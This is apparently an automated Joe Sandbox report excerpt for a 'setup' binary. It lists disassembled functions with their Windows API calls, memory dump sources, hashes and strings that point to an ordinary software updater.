                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Attributes$DeleteH_prolog3__strlen
                                                                                                                          • String ID: Deleting file : "%s"
                                                                                                                          • API String ID: 3666591681-3547222051
                                                                                                                          • Opcode ID: e9da9c7fad6a6354c3ca2ee5f5412adf49a6941d83f950b7cea75eb9b07d8f3d
                                                                                                                          • Instruction ID: 7ea1641990aea2e21da3d0eecad10ea98c68d930a5cef9173656cbec9a40bb3b
                                                                                                                          • Opcode Fuzzy Hash: e9da9c7fad6a6354c3ca2ee5f5412adf49a6941d83f950b7cea75eb9b07d8f3d
                                                                                                                          • Instruction Fuzzy Hash: 4F31A072E04208DFCB00EBA5D845AEE77B8EF49360F144629F561B7191DB309F84EBA1
                                                                                                                          Function 00C3AB85 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 79registryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • RegOpenKeyExW.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 00C3ABC0
                                                                                                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 00C3ABEC
                                                                                                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 00C3AC18
                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00C3AC2A
                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00C3AC39
                                                                                                                            • Part of subcall function 00C1E9FF: GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 00C1EA0F
                                                                                                                            • Part of subcall function 00C1E9FF: GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 00C1EA1F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseCreate$AddressHandleModuleOpenProc
                                                                                                                          • String ID: software
                                                                                                                          • API String ID: 550756860-2010147023
                                                                                                                          • Opcode ID: 12ee8bc130f88efb73ab0b938cb8bb371ad9bf59062b39c52095ceb8e74e0259
                                                                                                                          • Instruction ID: a5cfd74139982914ba1c44a96cccd7b0378a6a20c3a378eefdc8234e39bc2c32
                                                                                                                          • Opcode Fuzzy Hash: 12ee8bc130f88efb73ab0b938cb8bb371ad9bf59062b39c52095ceb8e74e0259
                                                                                                                          • Instruction Fuzzy Hash: 89213B72A10119FBEB159F90DC89EFFBB7EEB44704F10406AB901E2150D7359E90EBA6
                                                                                                                          Function 00C1C89B Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 78timeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C1C8A2
                                                                                                                          • SetTimer.USER32(00000000,00000096,000000C8,00000000), ref: 00C1C945
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: H_prolog3_Timer
                                                                                                                          • String ID: Downloading : %s$Downloading new version of %s...$Failed! Socket Error!! ( %d )$Socket Error!
                                                                                                                          • API String ID: 2312686240-3567217922
                                                                                                                          • Opcode ID: 977e792f65ed8652b9aa513b46502ba08f36e4ee7315a4576cb84819e4794d26
                                                                                                                          • Instruction ID: 0953f639bd4811019329de2406d285757c1fa0645bd53467600b21c7a27a8d4e
                                                                                                                          • Opcode Fuzzy Hash: 977e792f65ed8652b9aa513b46502ba08f36e4ee7315a4576cb84819e4794d26
                                                                                                                          • Instruction Fuzzy Hash: FA210871A80702AFD720AF708CC2EEF73A9BF05704F480629F465671C1D7716D54EA65
                                                                                                                          Function 00C1C99A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 78timeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C1C9A1
                                                                                                                          • SetTimer.USER32(00000000,00000096,000000C8,00000000), ref: 00C1CA44
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: H_prolog3_Timer
                                                                                                                          • String ID: Downloading : %s$Downloading update for %s...$Failed! Socket Error!! ( %d )$Socket Error!
                                                                                                                          • API String ID: 2312686240-3870485862
                                                                                                                          • Opcode ID: 8fed968ef7ddb8814a3538a7d96676b2994cfdd5b48b8c25c7c3a920fa549fca
                                                                                                                          • Instruction ID: d9c97bdd2cd17303e26143fa7b77195332af0cdc4b0d0a25160f6e8fe67eb071
                                                                                                                          • Opcode Fuzzy Hash: 8fed968ef7ddb8814a3538a7d96676b2994cfdd5b48b8c25c7c3a920fa549fca
                                                                                                                          • Instruction Fuzzy Hash: C02102B16C0705AFD720EB708CC2EEBB6A9BF05710F480628F065671C1DB716E94BA61
                                                                                                                          Function 00C1B131 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 76sleepsynchronizationCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 00C1B138
                                                                                                                          • CreateMutexW.KERNEL32(00000000,00000001,?,0000006E,00000014,00C1C354,00000001,00000084,00C1C6EF), ref: 00C1B16D
                                                                                                                          • GetLastError.KERNEL32 ref: 00C1B176
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00C1B187
                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 00C1B1F8
                                                                                                                          Strings
                                                                                                                          • '%s' is running. It can't be running when it is about to be updated.Close %s and press retry to try again.Or press continue t, xrefs: 00C1B1B5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseCreateErrorH_prolog3HandleLastMutexSleep
                                                                                                                          • String ID: '%s' is running. It can't be running when it is about to be updated.Close %s and press retry to try again.Or press continue t
                                                                                                                          • API String ID: 4081624877-2588004037
                                                                                                                          • Opcode ID: 75817f040b1de7da94727e10bd999e010610722df5f1c7d1b79c24bfe22f0bb0
                                                                                                                          • Instruction ID: 579e31a42b2dd4f58a97a61246160c8c4eca3cc01e02c0ffd00ea331c88b4b7b
                                                                                                                          • Opcode Fuzzy Hash: 75817f040b1de7da94727e10bd999e010610722df5f1c7d1b79c24bfe22f0bb0
                                                                                                                          • Instruction Fuzzy Hash: 2C217C70900216ABDF10EBA4CC9AAEF7778AF10700F104429F512B71D1DB749E49EF61
                                                                                                                          Function 00C19707 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C1970E
                                                                                                                            • Part of subcall function 00C789DE: GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,00C15E54,00000000,?,00000000), ref: 00C789F3
                                                                                                                            • Part of subcall function 00C789DE: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C78A12
                                                                                                                            • Part of subcall function 00C038F1: _Deallocate.LIBCONCRT ref: 00C03906
                                                                                                                          • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00C197A9
                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,_permissiontest_,00000050), ref: 00C197B4
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,_permissiontest_,00000050), ref: 00C197BD
                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,_permissiontest_,00000050), ref: 00C197CF
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Time$CloseCreateDeallocateDeleteErrorH_prolog3_HandleLastSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                          • String ID: _permissiontest_
                                                                                                                          • API String ID: 1405794384-1367907562
                                                                                                                          • Opcode ID: d7767154e71a11e1eb43fc41e3bbbdd95049c30f0f52eaebfcc64a6f11db6492
                                                                                                                          • Instruction ID: 3eeb0ae4b1f72d1adb264e0f53330028f7fe06bc10a076ff76eb0c857e0a973b
                                                                                                                          • Opcode Fuzzy Hash: d7767154e71a11e1eb43fc41e3bbbdd95049c30f0f52eaebfcc64a6f11db6492
                                                                                                                          • Instruction Fuzzy Hash: 9C213D71D40208BEDB04EBF4DC5AADDB7B8AF15300F608555F211A61E2DF745A08E661
                                                                                                                          Function 00C841E2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,4641B5ED,?,00C842F1,?,?,00000000,?), ref: 00C842A3
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeLibrary
                                                                                                                          • String ID: api-ms-$ext-ms-
                                                                                                                          • API String ID: 3664257935-537541572
                                                                                                                          • Opcode ID: f17b3d5fa4d614922d1bad6e24b01ffdaf3c6d2d906b3f9bc57ac8a5ca195ae1
                                                                                                                          • Instruction ID: c3d96c87c79722aeb4fae552c7dd739f82143c2cc988609246880660ec589837
                                                                                                                          • Opcode Fuzzy Hash: f17b3d5fa4d614922d1bad6e24b01ffdaf3c6d2d906b3f9bc57ac8a5ca195ae1
                                                                                                                          • Instruction Fuzzy Hash: FE21E731A05226ABCB25AB65EC44F5F3B68AF427B8F150125FD25A72D1E730EE00C7D4
                                                                                                                          Function 00C2E367 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetDC.USER32(00000000), ref: 00C2E390
                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C2E3AC
                                                                                                                          • MulDiv.KERNEL32(00000000), ref: 00C2E3B3
                                                                                                                          • DPtoLP.GDI32(00000000,?,00000001), ref: 00C2E3C8
                                                                                                                          • DPtoLP.GDI32(00000000,?,00000001), ref: 00C2E3DB
                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00C2E3FB
                                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 00C2E405
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3808545654-0
                                                                                                                          • Opcode ID: f9505488fdd2e791b944bb9397ffc2ac5316ba018950dd70b131a393b8e8bc3c
                                                                                                                          • Instruction ID: e747f9fb901e6133b7e86022b7932ebd09428279516f432619bd30f860a48b9e
                                                                                                                          • Opcode Fuzzy Hash: f9505488fdd2e791b944bb9397ffc2ac5316ba018950dd70b131a393b8e8bc3c
                                                                                                                          • Instruction Fuzzy Hash: DB210771A04328AFDB10DFB4DC8DAAEBBB9FB08711F10411AF509EB291DB709944CB51
                                                                                                                          Function 00C327E3 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 70libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,user32.dll), ref: 00C327F4
                                                                                                                          • GetProcAddress.KERNEL32(00000000,RegisterTouchWindow), ref: 00C32806
                                                                                                                          • GetProcAddress.KERNEL32(00000000,UnregisterTouchWindow), ref: 00C32814
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                          • String ID: RegisterTouchWindow$UnregisterTouchWindow$user32.dll
                                                                                                                          • API String ID: 667068680-2470269259
                                                                                                                          • Opcode ID: a5aa8e94d5682c3130f455225bcfdb6393b0095bba40f654ef1175aaac4adebf
                                                                                                                          • Instruction ID: 2058e5b139f63a341f1dd307110367050460343af8c2c109c2b3b4b8c47146b6
                                                                                                                          • Opcode Fuzzy Hash: a5aa8e94d5682c3130f455225bcfdb6393b0095bba40f654ef1175aaac4adebf
                                                                                                                          • Instruction Fuzzy Hash: 6B11E633610615AFCF001BA5DC4CB6DF768FF547A4F10003AF90593AA0CB71AC1186E2
                                                                                                                          Function 00C3D6CE Relevance: 10.6, APIs: 7, Instructions: 66COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • RealChildWindowFromPoint.USER32(?,?,?), ref: 00C3D6F2
                                                                                                                          • ClientToScreen.USER32(?,?), ref: 00C3D70C
                                                                                                                          • GetWindow.USER32(?,00000005), ref: 00C3D75E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$ChildClientFromPointRealScreen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2518355518-0
                                                                                                                          • Opcode ID: dce516d693a81d392c986e7857637e0dbbdb61df69cf296b3cda9ad6ae702888
                                                                                                                          • Instruction ID: ea5d3a239c9034f3378c91be1c3f2b3166140f3f8c4fa3c0d1254679bf9ef06e
                                                                                                                          • Opcode Fuzzy Hash: dce516d693a81d392c986e7857637e0dbbdb61df69cf296b3cda9ad6ae702888
                                                                                                                          • Instruction Fuzzy Hash: 82118431911119ABCB11DFA8DC4CFEF77B9AF4A310F510125F502E3294EB349A458BA1
                                                                                                                          Function 00C20554 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 65stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,00000000), ref: 00C205A1
                                                                                                                          • wsprintfW.USER32 ref: 00C205C7
                                                                                                                          • VerQueryValueW.VERSION(?,?,?,?), ref: 00C205E7
                                                                                                                          • lstrcpyW.KERNEL32(00C20519,?), ref: 00C205F8
                                                                                                                          Strings
                                                                                                                          • \VarFileInfo\Translation, xrefs: 00C2059A
                                                                                                                          • \StringFileInfo\%04x%04x\%s, xrefs: 00C205C1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: QueryValue$lstrcpywsprintf
                                                                                                                          • String ID: \StringFileInfo\%04x%04x\%s$\VarFileInfo\Translation
                                                                                                                          • API String ID: 209441233-2466519063
                                                                                                                          • Opcode ID: 94730b0fbc43395114e983b95bba1d2ad4e0bcff754e62da93e9d8e86b13fb7b
                                                                                                                          • Instruction ID: 4bcd6010b0d7b43e18ce2dbb99ca1cc4e62d099ed5662103112982891a0a9281
                                                                                                                          • Opcode Fuzzy Hash: 94730b0fbc43395114e983b95bba1d2ad4e0bcff754e62da93e9d8e86b13fb7b
                                                                                                                          • Instruction Fuzzy Hash: C4116DB2600129AFCB209F65DC84BFBB7BDBF48701F1400B6B949D2551EF719A54DBA0
                                                                                                                          Function 00C30C44 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • IsWindow.USER32(00000000), ref: 00C30C5B
                                                                                                                          • FindResourceW.KERNEL32(?,00000000,AFX_DIALOG_LAYOUT), ref: 00C30C83
                                                                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 00C30C95
                                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 00C30CA1
                                                                                                                          • LockResource.KERNEL32(00000000), ref: 00C30CAC
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Resource$FindLoadLockSizeofWindow
                                                                                                                          • String ID: AFX_DIALOG_LAYOUT
                                                                                                                          • API String ID: 2582447065-2436846380
                                                                                                                          • Opcode ID: a3c1b80af8811e94be247f8a9309a6bd94daecff1346aff2cc429a75d121adb5
                                                                                                                          • Instruction ID: 0efa2839e766da2f1a3a9de3d9be94710f6b10b8fba369e3cf468aa510dfa630
                                                                                                                          • Opcode Fuzzy Hash: a3c1b80af8811e94be247f8a9309a6bd94daecff1346aff2cc429a75d121adb5
                                                                                                                          • Instruction Fuzzy Hash: 96118E72620310AFDB119BB9EC4CB6E76ACFB44751F24122AF901D2261EA74DE40D761
                                                                                                                          Function 00C2619A Relevance: 10.6, APIs: 7, Instructions: 58windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • DeleteObject.GDI32(?), ref: 00C261C1
                                                                                                                          • GetIconInfo.USER32(?,?), ref: 00C261E5
                                                                                                                          • GetObjectW.GDI32(?,00000018,?), ref: 00C261F9
                                                                                                                          • DeleteObject.GDI32(?), ref: 00C2620A
                                                                                                                          • DeleteObject.GDI32(?), ref: 00C2620F
                                                                                                                          • IsWindow.USER32(?), ref: 00C26219
                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00C26233
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Object$Delete$IconInfoInvalidateRectWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2140499309-0
